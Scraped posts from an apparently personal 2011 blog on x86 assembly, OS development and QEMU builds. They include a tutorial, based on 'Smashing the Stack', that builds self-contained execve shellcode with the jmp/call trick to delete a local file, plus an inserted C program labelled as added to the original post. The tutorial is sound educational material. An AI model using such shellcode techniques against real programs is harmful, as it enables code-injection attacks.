<span style="color: #595979;">/* push trick */</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">push $0;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> push $2;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">sp, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> xorl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> mov $162, %al;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> xorl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> leal 0x1(</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx), </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> </span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;"> </span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre><div style="font-family: inherit;">The size of the above code is reduced to 19 bytes.<br />
That removes 11 bytes from the code.<br />
Now the wait system call and exit system call only cost 19 bytes instead of 42 bytes.<br />
<br />
</div><div style="font-family: inherit;">These tricks are very useful in some situations, enjoy. :D </div></div></div>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-52384248783684696572011-10-14T08:14:00.000-07:002011-12-17T07:50:26.927-08:00Dennis Ritchie R.I.P#include <stdio.h><br />
<br />
int main(void){<br />
printf("Rest in peace Dennis Ritchie, father of the C language, great programmer and a true hacker. You changed the whole world.\n");<br />
return 0;<br />
}Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com3tag:blogger.com,1999:blog-1191178933370250826.post-74023363225176222712011-10-08T11:32:00.000-07:002011-10-08T11:32:02.462-07:00SimpleOS source codeI finally uploaded my OS source code to GitHub. The following is the link:<br />
<a href="https://github.com/mike820324/SimpleOS">https://github.com/mike820324/SimpleOS</a><br />
<br />
Recently I have been very busy because of school work. When my school work is finished, I will post some articles about the source code, from the booting process to protected mode, in detail. :PAnonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-57515242170543801992011-08-13T09:16:00.000-07:002011-12-08T07:17:14.533-08:00Simple OS - noteWhile I was working on my simple operating system project, I found something interesting.<br />
Almost all x86 systems boot up in 16-bit real mode, and the way to enable protected mode is quite easy.<br />
As the <a href="http://wiki.osdev.org/Babystep7">osdev wiki</a> suggests, the following instructions take us from real mode to protected mode (the elided parts load a GDT with lgdt before this and perform a far jump afterwards to load a 32-bit code selector; setting the PE bit on its own is not enough).<br />
<div style="font-family: "Courier New",Courier,monospace;">
....</div>
<pre style="font-family: "Courier New",Courier,monospace;"><span class="kw1">mov</span> <span class="kw3">eax</span><span class="sy0">,</span> <span class="kw3">cr0</span> <span class="co1">; switch to pmode by</span>
<span class="kw1">or</span> <span class="kw3">al</span><span class="sy0">,</span><span class="nu0">1</span> <span class="co1">; set pmode bit</span>
<span class="kw1">mov</span> <span class="kw3">cr0</span><span class="sy0">,</span> <span class="kw3">eax</span></pre>
<pre style="font-family: "Courier New",Courier,monospace;"><span class="kw3">.....</span></pre>
<pre style="font-family: "Courier New",Courier,monospace;"><span class="kw3"> </span></pre>
<pre style="font-family: inherit;"><span class="kw3">But one thing bothered me a lot: since our code is still running in real mode, </span></pre>
<pre style="font-family: inherit;"><span class="kw3">how can we use 32-bit registers and instructions at all?</span></pre>
<pre style="font-family: inherit;"><span class="kw3"> </span></pre>
<pre style="font-family: inherit;"><span class="kw3">After googling for a while I found two very helpful answers that completely resolved my question.</span></pre>
<pre style="font-family: inherit;"><span class="kw3"><a href="http://stackoverflow.com/questions/6917503/assembly-question">answer in stackoverflow</a> </span></pre>
<pre style="font-family: inherit;"><span class="kw3"><a href="http://forum.nasm.us/index.php?topic=991.0">answer in nasm forum</a> </span></pre>
<pre style="font-family: inherit;"><span class="kw3"> </span></pre>
<pre style="font-family: inherit;"><span class="kw3">The answer is that</span></pre>
<pre style="font-family: inherit;">when Intel introduced 32-bit code, they used the same opcodes! </pre>
<div style="font-family: inherit;">
When a 32-bit register is used in 16-bit real mode, the assembler places an operand-size override prefix in front of the instruction (0x66, according to the nasm forum answer). This tells the CPU that the operand is 32 bits wide even though the default operand size of a 16-bit code segment is 16 bits. (A similar prefix, 0x67, overrides the address size so that 32-bit addressing can be used from 16-bit code.) The same byte works the other way round in a 32-bit code segment, where it selects a 16-bit operand.</div>
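<div style="font-family: inherit;">
To make the prefix rule concrete, here is an added C program that is not from the original post or the linked answers. It decodes the B8+r "mov reg, imm" encoding the way the CPU does, applying 0x66 relative to the default operand size of the code segment. The byte strings are constructed by hand: 66 B8 00 00 00 00 is what the assembler emits for mov eax, 0 in a 16-bit segment, B8 34 12 is mov ax, 0x1234, and BB 78 56 34 12 is mov ebx, 0x12345678 in a 32-bit segment. Feeding the first six bytes to the decoder as 32-bit code shows the other side of the rule: there 0x66 shrinks the operand to 16 bits, the instruction is only four bytes long, and the two trailing zero bytes would be decoded as the start of the next instruction.</div>

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Decoded form of one "mov r16/r32, imm" instruction (opcode B8+r). */
struct mov_imm {
    int      valid;   /* 1 if the bytes were a B8+r mov with a complete immediate */
    int      opsize;  /* effective operand size in bits: 16 or 32 */
    int      reg;     /* register number 0..7 (0 = ax/eax, 3 = bx/ebx, ...) */
    uint32_t imm;     /* the immediate operand */
    size_t   length;  /* instruction length in bytes, prefixes included */
};

/* Constructed sample encodings (not taken from the screenshots above). */
static const uint8_t MOV_EAX_0_16BIT[]  = {0x66, 0xB8, 0x00, 0x00, 0x00, 0x00}; /* mov eax,0 in 16-bit code */
static const uint8_t MOV_AX_1234[]      = {0xB8, 0x34, 0x12};                   /* mov ax,0x1234 */
static const uint8_t MOV_EBX_12345678[] = {0xBB, 0x78, 0x56, 0x34, 0x12};       /* mov ebx,0x12345678 in 32-bit code */

/*
 * Decode a B8+r "mov reg, imm" starting at code[0].  default32 is the
 * default operand size of the code segment: 0 for 16-bit real mode,
 * 1 for a 32-bit protected-mode segment.  0x66 does not mean "32-bit",
 * it means "the other size", which is why the same bytes that select
 * eax in real mode select ax in a 32-bit segment.
 */
struct mov_imm decode_mov_imm(const uint8_t *code, size_t len, int default32)
{
    struct mov_imm r = {0, 0, 0, 0, 0};
    size_t i = 0;
    int opsize32 = default32;

    /* Consume legacy prefixes.  Only 0x66 matters for this opcode; 0x67
       (address size), the segment overrides and LOCK/REP are skipped and
       have no effect on a register-immediate mov.  A repeated 0x66 does
       not toggle back, it still just selects the non-default size. */
    while (i < len) {
        uint8_t b = code[i];
        if (b == 0x66) {
            opsize32 = !default32;
        } else if (b == 0x67 || b == 0xF0 || b == 0xF2 || b == 0xF3 ||
                   b == 0x26 || b == 0x2E || b == 0x36 || b == 0x3E ||
                   b == 0x64 || b == 0x65) {
            /* ignored for this instruction */
        } else {
            break;
        }
        i++;
    }

    if (i >= len || (code[i] & 0xF8) != 0xB8)
        return r;                        /* not a mov r, imm */
    r.reg = code[i] & 0x07;
    i++;

    size_t immlen = opsize32 ? 4 : 2;
    if (i + immlen > len)
        return r;                        /* immediate is truncated */
    for (size_t k = 0; k < immlen; k++)  /* little-endian immediate */
        r.imm |= (uint32_t)code[i + k] << (8 * k);

    r.opsize = opsize32 ? 32 : 16;
    r.length = i + immlen;
    r.valid  = 1;
    return r;
}

static void show(const char *mode, const uint8_t *code, size_t len, int default32)
{
    struct mov_imm m = decode_mov_imm(code, len, default32);
    if (!m.valid) {
        printf("%s: not a complete mov reg, imm\n", mode);
        return;
    }
    printf("%s: %d-bit mov, reg %d, imm 0x%x, %zu bytes\n",
           mode, m.opsize, m.reg, m.imm, m.length);
}

int main(void)
{
    show("16-bit code, 66 B8 00 00 00 00", MOV_EAX_0_16BIT,  sizeof MOV_EAX_0_16BIT,  0);
    show("16-bit code,    B8 34 12      ", MOV_AX_1234,      sizeof MOV_AX_1234,      0);
    /* Same six bytes seen by a 32-bit segment: 0x66 now shrinks the operand. */
    show("32-bit code, 66 B8 00 00 00 00", MOV_EAX_0_16BIT,  sizeof MOV_EAX_0_16BIT,  1);
    show("32-bit code,    BB 78 56 34 12", MOV_EBX_12345678, sizeof MOV_EBX_12345678, 1);
    return 0;
}
```

<div style="font-family: inherit;">Compile with gcc -std=c99 and run it; the decoder does not execute any of the bytes, so it works the same on a 64-bit host.</div>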
<div style="font-family: inherit;">
<br /></div>
<div style="font-family: inherit;">
I took some screenshots to verify the result.</div>
<pre style="font-family: inherit;"><span class="kw3">My environment is Ubuntu 10.10 and gcc 4.4.5.</span></pre>
<pre style="font-family: inherit;"><span class="kw3">I'm using qemu and gdb to verify the result.</span></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-r1XNQe1wU4M/TkanEZccEpI/AAAAAAAAAI4/qDVLD1h8NQ8/s1600/16_bit_real_mode1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="331" src="http://4.bp.blogspot.com/-r1XNQe1wU4M/TkanEZccEpI/AAAAAAAAAI4/qDVLD1h8NQ8/s640/16_bit_real_mode1.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-SBbjWu43j3w/TkanFcXpvcI/AAAAAAAAAI8/yTu9O3FyJmc/s1600/16_bit_real_mode_gdb_dump.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="291" src="http://3.bp.blogspot.com/-SBbjWu43j3w/TkanFcXpvcI/AAAAAAAAAI8/yTu9O3FyJmc/s640/16_bit_real_mode_gdb_dump.jpg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-fOQ5TBV3OT0/TkanGG29pgI/AAAAAAAAAJA/WHPEwH2-xMA/s1600/16_bit_real_mode_gdbdump2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="80" src="http://4.bp.blogspot.com/-fOQ5TBV3OT0/TkanGG29pgI/AAAAAAAAAJA/WHPEwH2-xMA/s640/16_bit_real_mode_gdbdump2.jpg" width="640" /></a></div>
<pre style="font-family: inherit;"><span class="kw3"> </span></pre>
<pre style="font-family: inherit;"><span class="kw3"> </span><span class="kw3"> </span></pre>
<pre style="font-family: inherit;"><span class="kw3">As you can see, there is a 0x66 prefix in front of the mov eax, 0 instruction.
</span></pre>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-92140401062611818872011-08-09T01:11:00.000-07:002011-12-06T11:54:18.794-08:00compile qemu under ubuntuFor some reason, I have to build QEMU from source.<br />
These are some notes on how I did it.<br />
<br />
My environment:<br />
ubuntu 10.10<br />
gcc 4.4.5<br />
<br />
<br />
1.<br />
Download the QEMU source code from the following link. Check the tarball against whatever checksum or signature the project publishes for it before building.<br />
<a href="http://wiki.qemu.org/Download">http://wiki.qemu.org/Download</a><br />
I chose version 0.15.<br />
<br />
2.<br />
Install the required libraries and tools.<br />
<span style="font-family: 'Courier New',Courier,monospace;">sudo apt-get install build-essential checkinstall</span><br />
<span style="font-family: 'Courier New',Courier,monospace;">sudo apt-get install zlib1g-dev libsdl1.2-dev</span><br />
<br />
3.<br />
Extract the tar.gz.<br />
<span style="font-family: "Courier New",Courier,monospace;">tar -xvf qemu-0.15.0.tar.gz</span><br />
<br />
4.<br />
cd into the directory and configure.<br />
<div style="font-family: "Courier New",Courier,monospace;">
./configure</div>
<br />
5.<br />
Build the source code.<br />
<div style="font-family: 'Courier New',Courier,monospace;">
make</div>
<br />
6.<br />
Install QEMU. You can use <b>make install</b>, but I recommend using checkinstall.<br />
It makes software you build from source easier to manage. <br />
(I can't find an uninstall target in QEMU's Makefile, so I use checkinstall instead of make install: it wraps the build in a package that the package manager can remove cleanly later.)<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">sudo checkinstall -D --install=no</span><br />
<span style="font-family: "Courier New",Courier,monospace;">sudo dpkg -i $package_name</span><br />
<b><span style="font-family: 'Courier New',Courier,monospace;"><span style="font-family: inherit;">P.S.</span> </span></b><br />
<b><span style="font-family: 'Courier New',Courier,monospace;"><span style="font-family: inherit;">a.</span></span></b><br />
<b><span style="font-family: 'Courier New',Courier,monospace;"><span style="font-family: inherit;">-D creates a Debian package for Debian-based distributions.</span></span></b><br />
<b><span style="font-family: 'Courier New',Courier,monospace;">If you want to build an RPM instead, use -R in place of -D.</span></b><br />
<b><span style="font-family: 'Courier New',Courier,monospace;">b.</span></b><br />
<b><span style="font-family: 'Courier New',Courier,monospace;">dpkg is the utility that installs a .deb package. To uninstall a package, use dpkg -r.</span></b><br />
<span style="font-family: "Courier New",Courier,monospace;"><br />
</span><br />
<span style="font-family: 'Courier New',Courier,monospace;">Reference websites:</span><span style="font-family: 'Courier New',Courier,monospace;"><span style="font-family: inherit;"> </span></span><br />
<span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: inherit;"><a href="http://hpclab.cs.pu.edu.tw/wiki/index.php/QEMU%28Ubuntu%29">http://hpclab.cs.pu.edu.tw/wiki/index.php/QEMU%28Ubuntu%29</a><br />
<a href="http://sites.google.com/site/embedded2009/weekly-small-project-list/build-qemu">http://sites.google.com/site/embedded2009/weekly-small-project-list/build-qemu</a></span></span><br />
<b><span style="font-family: "Courier New",Courier,monospace;"><a href="http://www.linuxjournal.com/content/using-checkinstall-build-packages-source">http://www.linuxjournal.com/content/using-checkinstall-build-packages-source</a><br />
<a href="http://www.falkotimme.com/howtos/checkinstall/">http://www.falkotimme.com/howtos/checkinstall/</a> </span></b><br />
<br />Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-57515242170543801992011-07-04T02:04:00.000-07:002011-11-02T08:47:44.430-07:00Shell code 5(execve system call)This article is mainly based on this paper:<br />
<a href="http://insecure.org/stf/smashstack.html">Smashing the Stack for Fun and Profit</a><br />
This time I'll use the execve system call to remove a file called "test".<br />
Before we start, let's see how execve works in C.<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">the man page of execve</span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #004a43;">#</span><span style="color: #004a43;">include </span><span style="color: maroon;"><</span><span style="color: #40015a;">unistd.h</span><span style="color: maroon;">></span>
<span style="color: #200080; font-weight: bold;">int</span> execve<span style="color: #308080;">(</span><span style="color: #200080; font-weight: bold;">const</span> <span style="color: #200080; font-weight: bold;">char</span> <span style="color: #308080;">*</span>filename<span style="color: #308080;">,</span> <span style="color: #200080; font-weight: bold;">char</span> <span style="color: #308080;">*</span><span style="color: #200080; font-weight: bold;">const</span> argv<span style="color: #308080;">[</span><span style="color: #308080;">]</span><span style="color: #308080;">,</span>
<span style="color: #200080; font-weight: bold;">char</span> <span style="color: #308080;">*</span><span style="color: #200080; font-weight: bold;">const</span> envp<span style="color: #308080;">[</span><span style="color: #308080;">]</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span></pre><div style="font-family: 'Courier New', Courier, monospace;"><br />
</div><span class="Apple-style-span" style="font-family: inherit;">As you can see, the execve system call takes three parameters.</span><br />
<span class="Apple-style-span" style="font-family: inherit;">1. filename is the path of the file you want to execute.</span><br />
<span class="Apple-style-span" style="font-family: inherit;">2. argv is an array of argument strings passed to the new program, terminated by a NULL pointer.</span><br />
<span class="Apple-style-span" style="font-family: inherit;">3. envp is the environment handed to the new program. Our shellcode simply passes NULL for it, so I will not explain it in detail.</span><br />
<span class="Apple-style-span" style="font-family: inherit;">Let's write a simple C program which uses the execve system call.</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">execve_pre.c</span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #004a43;">#</span><span style="color: #004a43;">include </span><span style="color: maroon;"><</span><span style="color: #40015a;">unistd.h</span><span style="color: maroon;">></span>
<span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
<span style="color: #200080; font-weight: bold;">char</span> <span style="color: #308080;">*</span>argv<span style="color: #308080;">[</span><span style="color: #308080;">]</span><span style="color: #308080;">=</span><span style="color: #406080;">{</span><span style="color: maroon;">"</span><span style="color: #1060b6;">/bin/rm</span><span style="color: maroon;">"</span><span style="color: #308080;">,</span><span style="color: maroon;">"</span><span style="color: #1060b6;">./test</span><span style="color: maroon;">"</span><span style="color: #308080;">,</span><span style="color: #7d0045;">NULL</span><span style="color: #406080;">}</span><span style="color: #406080;">;</span>
execve<span style="color: #308080;">(</span>argv<span style="color: #308080;">[</span><span style="color: #008c00;">0</span><span style="color: #308080;">]</span><span style="color: #308080;">,</span>argv<span style="color: #308080;">,</span><span style="color: #7d0045;">NULL</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre><div><span class="Apple-style-span" style="font-family: inherit;">Compile the program and run it with the following commands.</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">1. gcc -o exe.out execve_pre.c</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">2. touch test</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">P.S. the touch command creates an empty file.</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">3. ./exe.out</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><br />
</span></div><div><span class="Apple-style-span" style="font-family: inherit;">And you will see that "test" has been removed.</span></div><div><span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div><div><span class="Apple-style-span" style="font-family: inherit;">Now turn this into the inline assembly.</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">execve.c</span></div><pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">char</span> <span style="color: #308080;">*</span>argv<span style="color: #308080;">[</span><span style="color: #308080;">]</span><span style="color: #308080;">=</span><span style="color: #406080;">{</span><span style="color: maroon;">"</span><span style="color: #1060b6;">/bin/rm</span><span style="color: maroon;">"</span><span style="color: #308080;">,</span><span style="color: maroon;">"</span><span style="color: #1060b6;">./test</span><span style="color: maroon;">"</span><span style="color: #308080;">,</span><span style="color: #7d0045;">NULL</span><span style="color: #406080;">}</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">movl $0xb,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl argv,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $argv,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">dx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0x1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0x0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre><div><span class="Apple-style-span" style="font-family: inherit;">Compile and execute it (on a 64-bit system pass -m32 to gcc, since this code uses the 32-bit registers and the int $0x80 system call convention).</span></div><div><span class="Apple-style-span" style="font-family: inherit;">The result is the same as in the previous example.</span></div><div><span class="Apple-style-span" style="font-family: inherit;">However, as I mentioned before, I don't want the shellcode to depend on data stored outside it (here the argv array, which lives in the program's data section).</span></div><div><span class="Apple-style-span" style="font-family: inherit;">Therefore, I need to put the data inside the shellcode itself. </span></div><div><span class="Apple-style-span" style="font-family: inherit;">And the way I get the address of that data is still the same: the relative jmp/call trick.</span></div><div>This is what the code looks like:</div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">execve2.c</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"></span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">jmp 2f;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> 1:;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> xor </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> popl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> </span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> leal 0x8(</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si),</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> pushl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> pushl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> pushl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> </span>
<span style="color: #1060b6;"> movl $0xb,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">sp,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> xorl %edx,%edx</span><span style="color: #1060b6;">;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0x1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0x0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> 2:;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> call 1b;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .string </span><span style="color: maroon;">\"</span><span style="color: #308080;">/</span>bin<span style="color: #308080;">/</span>rm\<span style="color: maroon;">"</span><span style="color: #1060b6;">;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .string </span><span style="color: maroon;">\"</span><span style="color: #308080;">.</span><span style="color: #308080;">/</span>test<span style="color: maroon;">\"</span><span style="color: #1060b6;">;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .byte 0x0,0x0,0x0,0x0;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre></div><div>In order to create a structure like </div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">char *argv[]={"/bin/rm","./test",NULL};</span></div><span style="font-family: inherit;">I use the stack to build the array.</span><br />
<span style="font-family: 'Courier New',Courier,monospace;">1. Get the address of "/bin/rm" with the relative jmp/call trick and pop it into %esi.</span><br />
<span style="font-family: 'Courier New',Courier,monospace;">2. Copy %esi to %ebx.</span><br />
<span style="font-family: 'Courier New',Courier,monospace;">3. leal 0x8(%esi), %esi => %esi += 8;</span><br />
<span style="font-family: 'Courier New',Courier,monospace;">   "/bin/rm" plus its terminating NUL is 8 bytes long, so after this instruction %esi points to "./test".</span><br />
<span style="font-family: 'Courier New',Courier,monospace;">4. Push 0 (the zeroed %eax), then the address of "./test", then the address of "/bin/rm".</span><br />
